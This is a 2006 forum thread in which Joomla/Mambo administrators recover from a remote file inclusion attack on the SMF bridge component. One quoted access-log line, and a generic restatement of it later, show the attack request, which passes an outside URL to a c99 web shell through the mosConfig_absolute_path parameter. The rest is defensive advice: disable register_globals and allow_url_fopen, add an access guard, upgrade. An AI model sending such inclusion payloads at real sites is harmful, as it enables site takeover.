Security issue - eno7 hacker

[anna.young]

Our Joomla website has just been hacked through SMF component by the turkish eno7 hacker:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.xxxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

What are the practical steps to restore the website. 

And then what are the practical steps to prevent it from recurring

Thank you

Anna

[Miraenda]

Hi Anna,

I had the same IP attack and hack my Mambo site with SMF bridge.  I've taken my site down until I also get more details on resolving this.  I've also contacted 1&1 who hosts allianceforvirtualbiz.com to request the site be suspended as they are enabling the hacker to function by providing the file.

My webhost is going to block both 85.108.125.96 and 82.165.193.254 at the network level switch before it even hits the servers to ensure this isn't able to reach our network again.

I hope someone from SMF can help.

Thanks.

[Miraenda]

I found out more details that would pertain to Mambo/Joomla for this hack attempt:

http://forum.mamboserver.com/showthread.php?p=378826

Did you have register_globals set to On or is it set to on for your server?  If so, put a php.ini file on your account and set it to Off.  I thought I had mine set to off, but I guess there were 2 php.ini files on my server and it was going off the other one

Additionally, I'd follow reply #6 and put that code noted in that post into the file for your smf component.  Once I re-install mine from backup tonight, I'll give details on what file it would be (I imagine smf.php though as that's the file that was hit in the component).

[anna.young]

Thank you Miraenda

My configuration.php is gone, empty... I'm trying to locate one in my back up files & I'm not sure which one is the correct one.

Anna

[Tony Reid]

Ive got hit by this also and had to remove integration of SMF rc1.2 from my joomla site.

My logs were rotated before I could get to how they uploaded it - but I found a url very similar to the above one in my webalizer

Were you running Joomla 1.0.8? as that has known vulnerabilities - Im thinking that was the reason.

[Miraenda]

Hi Tony,

The issue is having register_globals set to ON.  If you do, you need to change it to off right now.

Next, you need to input in smf.php at components/com_smf the following code:

Koodi [Valitse] Laajenna

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

This will prevent by both this happening again.  It isn't the version that's the issue, it's that the component bridge is allowing the /components/com_smf/smf.php?mosConfig_absolute_path=http://someurl/somebadfile.txt to be passed.  Any component you have that allows that is going to leave you open to attack.

I posted about it at this url on my site that's now back:

http://ratingbar.com/component/option,com_smf/Itemid,26/topic,100.0/

Thanks.

[Tony Reid]

Thanks for the info Miraenda,

Tony

[Miraenda]

You're very welcome Tony

[Orstio]

Actually, part of the problem is also having allow_url_fopen set to On.

This has been secured in bridge 1.1.5a.  I suggest upgrading:

http://www.simplemachines.org/community/index.php?topic=97649.0

[Miraenda]

I was attempted to be hacked 3 times after I made the 2 changes (register_globals to off and the code inserted into smf.php file), and they haven't been able to get through.  Does the new bridge have this code in smf.php now or not?

Koodi [Valitse] Laajenna

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

If it does not, can this please be added to the newest bridge?

[Orstio]

Yes, it is there.

[Miraenda]

Cool, thanks Orstio

[anna.young]

Thank you Orstio, the above bridge is for SMF 1.1 RC2 only, I have RC1.  What should I do in my case? Is bridge 3.19a equally secure?

Thanks,

Anna

[Orstio]

No, in 3.19a, you will need to add the line of code Miraenda posted above.

[anna.young]

I just went through all files contained in Bridge 3.19a and I'm not able to locate smf.php which according to the instructions suppose to go into components/com_smf.

These goes in components/com_smf/:

smf.php

I'm obviously not looking into the right folders.  Which folder is that file in?

Thank you Orstio

Anna

[Orstio]

In 3.19a it will be in your Step 2 folder, inside the com_smf.zip.

[anna.young]

You are the most patient person Orstio I met in years...    Ever?

Thank you!!! Found it, added the 'security' lines, put it in and it works!!! 

What a day it had been!

Anna

[anna.young]

I'm happy to report that I had numerous attempts of the hacking since yesterday (same as Miraenda) and they were all unsuccessful. 

Thank you again 

Anna

[Miraenda]

Great to hear Anna

[myuption]

Good stuff, thanks!